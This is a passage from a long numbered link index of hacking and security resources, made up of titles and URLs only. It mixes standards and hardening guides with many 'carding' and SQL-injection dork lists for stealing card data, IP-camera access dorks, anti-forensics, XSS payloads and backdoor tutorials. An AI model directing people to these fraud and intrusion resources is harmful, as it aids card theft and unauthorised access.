DB:\n\n\n\nhttps://pastebin.com/De4DNNKK\n\n\n\n-1235-Dorks:\n\n\n\nhttps://pastebin.com/cfVcqknA\n\n\n\n-1236-GOOGLE HACKİNG DATABASE:\n\n\n\nhttps://pastebin.com/1ndqG7aq\n\n\n\n-1237-Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/Hqsxu6Nn\n\n\n\n-1238-17k Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/fgdZxy74\n\n\n\n\n\n-1239-CARDING DORKS 2019:\n\n\n\nhttps://pastebin.com/Y7KvzZqg\n\n\n\n\n-1240-sqli dork 2019:\n\n\nhttps://pastebin.com/8gdeLYvU\n\n\n\n\n-1241-Private Carding Dorks 2018:\n\n\n\nhttps://pastebin.com/F0KxkMMD\n\n\n\n-1242-20K dorks list fresh full carding 2018:\n\n\n\nhttps://pastebin.com/LgCh0NRJ\n\n\n\n\n-1243-8k Carding Dorks :):\n\n\n\nhttps://pastebin.com/2bjBPiEm\n\n\n\n\n-1244-8500 SQL DORKS:\n\n\n\nhttps://pastebin.com/yeREBFzp\n\n\n\n\n-1245-REAL CARDING DORKS:\n\n\n\nhttps://pastebin.com/0kMhA0Gb\n\n\n\n\n-1246-15k btc dorks:\n\n\n\nhttps://pastebin.com/zbbBXSfG\n\n\n\n\n-1247-Sqli dorks 2016-2017:\n\n\n\nhttps://pastebin.com/7TQiMj3A\n\n\n\n\n-1248-Here is kind of a tutorial on how to write google dorks.:\n\n\n\nhttps://pastebin.com/hZCXrAFK\n\n\n\n\n-1249-10k Private Fortnite Dorks:\n\n\n\nhttps://pastebin.com/SF9UmG1Y\n\n\n\n\n-1250-find login panel dorks:\n\n\n\nhttps://pastebin.com/9FGUPqZc\n\n\n\n\n\n\n-1251-Shell dorks:\n\n\n\n\nhttps://pastebin.com/iZBFQ5yp\n\n\n\n\n-1252-HQ PAID GAMING DORKS:\n\n\n\nhttps://pastebin.com/vNYnyW09\n\n\n\n\n-1253-10K HQ Shopping DORKS:\n\n\n\nhttps://pastebin.com/HTP6rAt4\n\n\n\n\n-1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold:\n\n\n\nhttps://pastebin.com/ttxAJbdW\n\n\n\n-1255-Gain access to unsecured IP cameras with these Google dorks:\n\n\n\n\nhttps://pastebin.com/93aPbwwE\n\n\n\n\n-1256-new fresh dorks:\n\n\n\nhttps://pastebin.com/ZjdxBbNB\n\n\n\n-1257-SQL DORKS FOR CC:\n\n\n\nhttps://pastebin.com/ZQTHwk2S\n\n\n\n\n-1258-Wordpress uploadify Dorks Priv8:\n\n\n\nhttps://pastebin.com/XAGmHVUr\n\n\n\n\n-1259-650 DORKS CC:\n\n\n\nhttps://pastebin.com/xZHARTyz\n\n\n\n\n-1260-3k 
Dorks Shopping:\n\n\n\nhttps://pastebin.com/e1XiNa8M\n\n\n\n\n\n-1261-DORKS 2018 :\n\n\n\nhttps://pastebin.com/YAZkPJ0j\n\n\n\n-1262-HQ FORTNITE DORKS LIST:\n\n\n\n\nhttps://pastebin.com/rzhiNad8\n\n\n\n\n-1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING:\n\n\n\nhttps://pastebin.com/VwVpAvj2\n\n\n\n\n-1264-Camera dorks:\n\n\n\nhttps://pastebin.com/fsARft2j\n\n\n\n\n-1265-Admin Login Dorks:\n\n\n\n\nhttps://pastebin.com/HWWNZCph\n\n\n\n\n-1266-sql gov dorks:\n\n\n\nhttps://pastebin.com/C8wqyNW8\n\n\n\n-1267-10k hq gaming dorks:\n\n\n\nhttps://pastebin.com/cDLN8edi\n\n\n\n\n-1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! :\n\n\n\n\nhttps://pastebin.com/y59kK2h0\n\n\n\n\n\n-1269-Dorks:\n\n\n\n\nhttps://pastebin.com/PKvZYMAa\n\n\n\n\n-1270-10k btc dorks:\n\n\n\nhttps://pastebin.com/vRnxvbCu\n\n\n\n\n-1271-7,000 Dorks for hacking into various sites:\n\n\n\nhttps://pastebin.com/n8JVQv3X\n\n\n\n-1272-List of information gathering search engines/tools etc:\n\n\nhttps://pastebin.com/GTX9X5tF\n\n\n\n-1273-FBOSINT:\n\n\n\nhttps://pastebin.com/5KqnFS0B\n\n\n\n-1274-Ultimate Penetration Testing:\n\n\n\nhttps://pastebin.com/4EEeEnXe\n\n\n\n-1275-massive list of information gathering search engines/tools :\n\n\n\nhttps://pastebin.com/GZ9TVxzh\n\n\n\n-1276-CEH Class:\n\n\n\nhttps://pastebin.com/JZdCHrN4\n\n\n\n-1277-CEH/CHFI Bundle Study Group Sessions:\n\n\n\nhttps://pastebin.com/XTwksPK7\n\n\n\n-1278-OSINT - Financial:\n\n\n\nhttps://pastebin.com/LtxkUi0Y\n\n\n\n\n-1279-Most Important Security Tools and Resources:\n\n\n\nhttps://pastebin.com/cGE8rG04\n\n\n\n-1280-OSINT resources from inteltechniques.com:\n\n\n\nhttps://pastebin.com/Zbdz7wit\n\n\n\n-1281-Red Team Tips:\n\n\nhttps://pastebin.com/AZDBAr1m\n\n\n\n-1282-OSCP Notes by Ash:\n\n\nhttps://pastebin.com/wFWx3a7U\n\n\n\n-1283-OSCP Prep:\n\n\nhttps://pastebin.com/98JG5f2v\n\n\n\n-1284-OSCP Review/Cheat Sheet:\n\n\n\nhttps://pastebin.com/JMMM7t4f\n\n\n\n-1285-OSCP Prep 
class:\n\n\nhttps://pastebin.com/s59GPJrr\n\n\n\n-1286-Complete Anti-Forensics Guide:\n\n\nhttps://pastebin.com/6V6wZK0i\n\n\n-1287-The Linux Command Line Cheat Sheet:\n\n\n\nhttps://pastebin.com/PUtWDKX5\n\n\n\n-1288-Command-Line Log Analysis:\n\n\nhttps://pastebin.com/WEDwpcz9\n\n\n\n-1289-An A-Z Index of the Apple macOS command line (OS X):\n\n\nhttps://pastebin.com/RmPLQA5f\n\n\n\n-1290-San Diego Exploit Development 2018:\n\n\nhttps://pastebin.com/VfwhT8Yd\n\n\n\n-1291-Windows Exploit Development Megaprimer:\n\n\nhttps://pastebin.com/DvdEW4Az\n\n\n\n-1292-Some Free Reverse engineering resources:\n\n\n\nhttps://pastebin.com/si2ThQPP\n\n\n\n\n-1293-Sans:\n\n\nhttps://pastebin.com/MKiSnjLm\n\n\n\n-1294-Metasploit Next Level:\n\n\nhttps://pastebin.com/0jC1BUiv\n\n\n\n-1295-Just playing around....:\n\n\n\nhttps://pastebin.com/gHXPzf6B\n\n\n\n-1296-Red Team Course:\n\n\nhttps://pastebin.com/YUYSXNpG\n\n\n\n-1297-New Exploit Development 2018:\n\n\n\nhttps://pastebin.com/xaRxgYqQ\n\n\n\n-1298-Good reviews of CTP/OSCE (in no particular order)::\n\n\n\nhttps://pastebin.com/RSPbatip\n\n\n\n-1299-Vulnerability Research Engineering Bookmarks Collection v1.0:\n\n\n\nhttps://pastebin.com/8mUhjGSU\n\n\n\n-1300-Professional-hacker's Pastebin :\n\n\n\nhttps://pastebin.com/u/Professional-hacker\n\n\n\n-1301-Google Cheat Sheet:\n\n\nhttp://www.googleguide.com/print/adv_op_ref.pdf\n\n\n\n-1302-Shodan for penetration testers:\n\n\n\nhttps://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf\n\n\n\n-1303-Linux networking tools:\n\n\n\nhttps://gist.github.com/miglen/70765e663c48ae0544da08c07006791f\n\n\n\n\n-1304-DNS spoofing with NetHunter:\n\n\n\nhttps://cyberarms.wordpress.com/category/nethunter-tutorial/\n\n\n\n\n-1305-Tips on writing a penetration testing report:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343\n\n\n\n\n-1306-Technical penetration report 
sample:\n\n\n\nhttps://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf\n\n\n\n\n\n-1307-Nessus sample reports:\n\n\n\nhttps://www.tenable.com/products/nessus/sample-reports\n\n\n\n\n-1308-Sample penetration testing report:\n\n\n\n\nhttps://www.offensive-security.com/reports/sample-penetration-testing-report.pdf\n\n\n\n\n-1309-jonh-the-ripper-cheat-sheet:\n\n\n\nhttps://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/\n\n\n\n\n-1310-ultimate guide to cracking foreign character passwords using hashcat:\n\n\n\nhttp://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has\n\n\n\n\n-1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III:\n\n\n\nhttps://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III\n\n\n\n\n-1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords:\n\n\n\nhttp://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/\n\n\n\n-1313-CSA (Cloud Security Alliance) Security White Papers:\n\n\n\nhttps://cloudsecurityalliance.org/download/\n\n\n\n-1314-NIST Security Considerations in the System Development Life Cycle:\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf\n\n\n\n\n-1315-ISO 29100 information technology security techniques privacy framework:\n\n\n\nhttps://www.iso.org/standard/45123.html\n\n\n\n\n-1316-NIST National Checklist Program:\n\n\n\nhttps://nvd.nist.gov/ncp/repository\n\n\n\n-1317-OWASP Guide to Cryptography:\n\n\n\nhttps://www.owasp.org/index.php/Guide_to_Cryptography\n\n\n\n-1318-NVD (National Vulnerability Database):\n\n\n\nhttps://nvd.nist.gov/\n\n\n\n-1319-CVE details:\n\n\n\nhttps://cvedetails.com/\n\n\n\n-1320-CIS Cybersecurity Tools:\n\n\n\n\nhttps://www.cisecurity.org/cybersecurity-tools/\n\n\n\n\n-1321-Security aspects of virtualization by 
ENISA:\n\n\n\nhttps://www.enisa.europa.eu/publications/security-aspects-of-virtualization/\n\n\n\n-1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes:\n\n\n\nhttps://www.cisecurity.org/cis-benchmarks/\n\n\n\n\n-1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer:\n\n\n\nhttps://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html\n\n\n\n\n-1324-Docker security:\n\n\n\nhttps://docs.docker.com/engine/security/security/\n\n\n\n\n-1325-Microsoft Security Development Lifecycle:\n\n\n\nhttp://www.microsoft.com/en-us/SDL/\n\n\n\n\n-1326-OWASP SAMM Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_SAMM_Project\n\n\n\n-1327-CWE/SANS Top 25 Most Dangerous Software Errors:\n\n\n\nhttps://cwe.mitre.org/top25/\n\n\n\n\n-1329-OWASP Vulnerable Web Applications Directory Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project\n\n\n\n\n-1330-CERT Secure Coding Standards:\n\n\nhttps://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards\n\n\n\n-1331-NIST Special Publication 800-53:\n\n\n\nhttps://nvd.nist.gov/800-53\n\n\n\n\n-1332-SAFECode Security White Papers:\n\n\n\n\nhttps://safecode.org/publications/\n\n\n\n\n-1333-Microsoft Threat Modeling tool 2016:\n\n\n\n\nhttps://aka.ms/tmt2016/\n\n\n\n\n-1334-Apache Metron for real-time big data security:\n\n\n\nhttp://metron.apache.org/documentation/\n\n\n\n\n-1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process:\n\n\n\nhttps://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf\n\n\n\n\n-1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\nhttp://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf\n\n\n\n\n\n-1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end 
communications:\n\n\n\n\nhttps://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items\n\n\n\n\n-1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf\n\n\n\n\n-1339-SAFECode Fundamental Practices for Secure Software Development:\n\n\n\nhttps://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf\n\n\n\n\n\n-1340-NIST 800-64 Security Considerations in the System Development Life Cycle:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final\n\n\n\n-1341-SANS A Security Checklist for Web Application Design:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1342-Best Practices for implementing a Security Awareness Program:\n\n\n\nhttps://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf\n\n\n\n\n-1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf\n\n\n\n\n-1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final\n\n\n\n\n-1345-SafeCode Tactical Threat Modeling:\n\n\n\nhttps://safecode.org/safecodepublications/tactical-threat-modeling/\n\n\n\n\n-1346-SANS Web Application Security Design Checklist:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1347-Data Anonymization for production data dumps:\n\n\n\nhttps://github.com/sunitparekh/data-anonymization\n\n\n\n\n-1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use 
It:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030\n\n\n\n\n-1349-Guide to Computer Security Log Management:\n\n\nhttps://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881\n\n\n\n\n-1350-Malware Indicators:\n\n\n\n\nhttps://github.com/citizenlab/malware-indicators\n\n\n\n\n-1351-OSINT Threat Feeds:\n\n\n\nhttps://www.circl.lu/doc/misp/feed-osint/\n\n\n\n\n-1352-SANS How to Use Threat Intelligence effectively:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282\n\n\n\n\n-1353-NIST 800-150 Guide to Cyber Threat Information Sharing:\n\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf\n\n\n\n\n-1354-Securing Web Application Technologies Checklist:\n\n\n\nhttps://software-security.sans.org/resources/swat\n\n\n\n-1355-Firmware Security Training:\n\n\n\n\nhttps://github.com/advanced-threat-research/firmware-security-training\n\n\n\n-1356-Burp Suite Bootcamp:\n\n\n\nhttps://pastebin.com/5sG7Rpg5\n\n\n\n\n-1357-Web app hacking:\n\n\n\nhttps://pastebin.com/ANsw7WRx\n\n\n\n\n-1358-XSS Payload:\n\n\n\nhttps://pastebin.com/EdxzE4P1\n\n\n\n-1359-XSS Filter Evasion Cheat Sheet:\n\n\n\nhttps://pastebin.com/bUutGfSy\n\n\n\n-1360-Persistence using RunOnceEx – Hidden from Autoruns.exe:\n\n\n\nhttps://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\n\n\n\n-1361-Windows Operating System Archaeology:\n\n\n\nhttps://www.slideshare.net/enigma0x3/windows-operating-system-archaeology\n\n\n\n-1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky:\n\n\n\nhttps://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/\n\n\n\n-1363-Malware Analysis using Osquery :\n\n\n\nhttps://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec\n\n\n\n-1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals 
:\n\n\n\nhttps://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/\n\n\n\n\n-1365-Userland registry hijacking:\n\n\n\nhttps://3gstudent.github.io/Userland-registry-hijacking/\n\n\n\n\n-1366-Malware Hiding Techniques to Watch for: AlienVault Labs:\n\n\n\nhttps://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs\n\n\n\n-1367- Full text of ""Google hacking for penetration testers"" :\n\n\n\nhttps://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt\n\n\n\n\n-1368- Full text of ""Long, Johnny Google Hacking For Penetration Testers"" :\n\n\n\nhttps://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1369- Full text of ""Coding For Penetration Testers"" :\n\n\n\nhttps://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1370- Full text of ""Hacking For Dummies"" :\n\n\n\nhttps://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt\n\n\n\n\n-1371-Full text of ""Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. 
Profescience.blogspot.com"" :\n\n\n\n\nhttps://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt\n\n\n\n\n-1372- Full text of ""Social Engineering The Art Of Human Hacking"" :\n\n\n\nhttps://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt\n\n\n\n\n-1373- Full text of ""CYBER WARFARE"" :\n\n\n\nhttps://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt\n\n\n\n\n-1374-Full text of ""NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research"" :\n\n\n\n\nhttps://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt\n\n\n\n\n-1375- Full text of ""sectools"" :\n\n\n\n\nhttps://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt\n\n\n\n\n-1376- Full text of ""Aggressive network self-defense"" :\n\n\n\n\n\nhttps://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt\n\n\n\n\n\n-1377-Community Texts:\n\n\n\n\nhttps://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22\n\n\n\n\n-1378- Full text of ""Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)"" :\n\n\n\n\nhttps://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt\n\n\n\n\n-1379- Full text of ""Enzyclopedia Of Cybercrime"" :\n\n\n\nhttps://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt\n\n\n\n\n-1380- Full text of ""Information Security Management Handbook"" :\n\n\n\nhttps://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt\n\n\n\n\n\n-1381- Full text of ""ARMArchitecture Reference Manual"" 
:\n\n\n\n\nhttps://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt\n\n\n\n\n\n-1382- Full text of ""Metasploit The Penetration Tester S Guide"" :\n\n\n\nhttps://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt\n\n\n\n\n-1383-Tips & tricks to master Google’s search engine:\n\n\nhttps://medium.com/infosec-adventures/google-hacking-39599373be7d\n\n\n\n\n-1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) :\n\n\nhttps://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866\n\n\n\n\n-1385- Google Hacking Secrets:the Hidden Codes of Google :\n\n\n\nhttps://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google\n\n\n\n\n-1386-google hacking:\n\n\n\nhttps://www.slideshare.net/SamNizam/3-google-hacking\n\n\n\n\n\n-1387-How Penetration Testers Use Google Hacking:\n\n\n\n\nhttps://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking\n\n\n\n\n-1388-Free Automated Malware Analysis Sandboxes and Services:\n\n\n\nhttps://zeltser.com/automated-malware-analysis/\n\n\n\n\n-1389-How to get started with Malware Analysis and Reverse Engineering:\n\n\n\nhttps://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/\n\n\n\n-1390-Handy Tools And Websites For Malware Analysis:\n\n\n\nhttps://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/\n\n\n\n\n-1391-Dynamic Malware Analysis:\n\n\nhttps://prasannamundas.com/share/dynamic-malware-analysis/\n\n\n\n-1392-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1393-Detecting malware through static and dynamic techniques:\n\n\n\nhttps://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec...\n\n\n\n\n-1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis 
Tools:\n\n\n\nhttps://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools\n\n\n\n-1395-Malware Analysis Lab At Home In 5 Steps:\n\n\n\nhttps://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/\n\n\n\n\n-1396-Malware Forensics Guide - Static and Dynamic Approach:\n\n\n\nhttps://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/\n\n\n\n\n-1397-Top 30 Bug Bounty Programs in 2019:\n\n\nhttps://www.guru99.com/bug-bounty-programs.html\n\n\n\n\n-1398-Introduction - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\n\n\n\n-1399-List of bug bounty writeups:\n\n\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n\n-1400-Tips From A Bugbounty Hunter:\n\n\n\nhttps://www.secjuice.com/bugbounty-hunter/\n\n\n\n\n-1401-Cross Site Scripting (XSS) - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss\n\n\n\n\n-1402-BugBountyTips:\n\n\n\nhttps://null0xp.wordpress.com/tag/bugbountytips/\n\n\n\n\n-1403-Xss Filter Bypass Payloads:\n\n\n\nwww.oroazteca.net/mq67/xss-filter-bypass-payloads.html\n\n\n\n\n-1404-Bug Bounty Methodology:\n\n\n\nhttps://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0\n\n\n\n-1405-GDB cheat-sheet for exploit development:\n\n\n\nwww.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html\n\n\n\n\n-1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n\n-1407-Exploit development tutorial :\n\n\n\nhttps://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux\n\n\n\n-1408-exploit code development:\n\n\nhttp://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf\n\n\n\n-1409-“Help Defeat Denial of Service Attacks: Step-by-Step”:\n\n\n\nhttp://www.sans.org/dosstep/\n\n\n\n\n-1410-Internet 
Firewalls: Frequently Asked Questions:\n\n\n\n\nhttp://www.interhack.net/pubs/fwfaq/\n\n\n\n\n-1411-Service Name and Transport Protocol Port Number:\n\n\n\nhttp://www.iana.org/assignments/port-numbers\n\n\n\n-1412-10 Useful Open Source Security Firewalls for Linux Systems:\n\n\n\nhttps://www.tecmint.com/open-source-security-firewalls-for-linux-systems/\n\n\n\n\n-1413-40 Linux Server Hardening Security Tips:\n\n\n\nhttps://www.cyberciti.biz/tips/linux-security.html\n\n\n\n\n-1414-Linux hardening: A 15-step checklist for a secure Linux server :\n\n\n\nhttps://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server\n\n\n\n-1415-25 Hardening Security Tips for Linux Servers:\n\n\n\nhttps://www.tecmint.com/linux-server-hardening-security-tips/\n\n\n\n\n-1416-How to Harden Unix/Linux Systems & Close Security Gaps:\n\n\n\nhttps://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps\n\n\n\n\n-1417-34 Linux Server Security Tips & Checklists for Sysadmins:\n\n\n\nhttps://www.process.st/server-security/\n\n\n\n\n-1418-Linux Hardening:\n\n\n\nhttps://www.slideshare.net/MichaelBoelen/linux-hardening\n\n\n\n\n-1419-23 Hardening Tips to Secure your Linux Server:\n\n\n\nhttps://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/\n\n\n\n\n-1420-What is the Windows Registry? 
:\n\n\nhttps://www.computerhope.com/jargon/r/registry.htm\n\n\n\n\n-1421-Windows Registry, Everything You Need To Know:\n\n\n\nhttps://www.gammadyne.com/registry.htm\n\n\n\n-1422-Windows Registry Tutorial:\n\n\n\nhttps://www.akadia.com/services/windows_registry_tutorial.html\n\n\n\n\n-1423-5 Tools to Scan a Linux Server for Malware and Rootkits:\n\n\n\nhttps://www.tecmint.com/scan-linux-for-malware-and-rootkits/\n\n\n\n-1424-Subdomain takeover dew to missconfigured project settings for Custom domain .:\n\n\n\nhttps://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969\n\n\n\n\n-1425-Massive Subdomains p0wned:\n\n\n\nhttps://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e\n\n\n\n-1426-Subdomain Takeover: Basics:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-basics/\n\n\n\n-1427-Subdomain Takeover: Finding Candidates:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-candidates/\n\n\n\n-1428-Bugcrowd's Domain & Subdomain Takeover!:\n\n\n\nhttps://bugbountypoc.com/bugcrowds-domain-takeover/\n\n\n\n\n-1429-What Are Subdomain Takeovers, How to Test and Avoid Them?:\n\n\n\nhttps://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid\n\n\n\n\n-1430-Finding Candidates for Subdomain Takeovers:\n\n\n\nhttps://jarv.is/notes/finding-candidates-subdomain-takeovers/\n\n\n\n\n-1431-Subdomain takeover of blog.snapchat.com:\n\n\n\nhttps://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7\n\n\n\n\n-1432-Hostile Subdomain takeove:\n\n\n\nhttps://labs.detectify.com/tag/hostile-subdomain-takeover/\n\n\n\n-1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users:\n\n\n\nhttps://www.safetydetective.com/blog/microsoft-outlook/\n\n\n\n\n-1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? 
& Exploit It?:\n\n\n\nhttps://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/\n\n\n\n\n-1435-Subdomain takeover detection with AQUATONE:\n\n\n\nhttps://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/\n\n\n\n-1436-A hostile subdomain takeover! – Breaking application security:\n\n\n\nhttps://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/\n\n\n\n\n-1437-Web Development Reading List:\n\n\n\nhttps://www.smashingmagazine.com/2017/03/web-development-reading-list-172/\n\n\n\n\n-1438-CSRF Attack can lead to Stored XSS:\n\n\n\nhttps://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f\n\n\n\n-1439-What is Mimikatz: The Beginner's Guide | Varonis:\n\n\n\nhttps://www.varonis.com/bog/what-is-mimikatz\n\n\n\n-1440-Preventing Mimikatz Attacks :\n\n\n\nhttps://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5\n\n\n\n\n-1441-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\n\nhttps://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n\n-1442-Mimikatz: Walkthrough [Updated 2019]:\n\n\n\nhttps://resources.infosecinstitute.com/mimikatz-walkthrough/\n\n\n\n-1443-Mimikatz -Windows Tutorial for Beginner:\n\n\n\nhttps://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/\n\n\n\n\n-1444-Mitigations against Mimikatz Style Attacks:\n\n\n\nhttps://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks\n\n\n\n\n-1445-Exploring Mimikatz - Part 1 :\n\n\n\nhttps://blog.xpnsec.com/exploring-mimikatz-part-1/\n\n\n\n\n-1446-Powershell AV Evasion. 
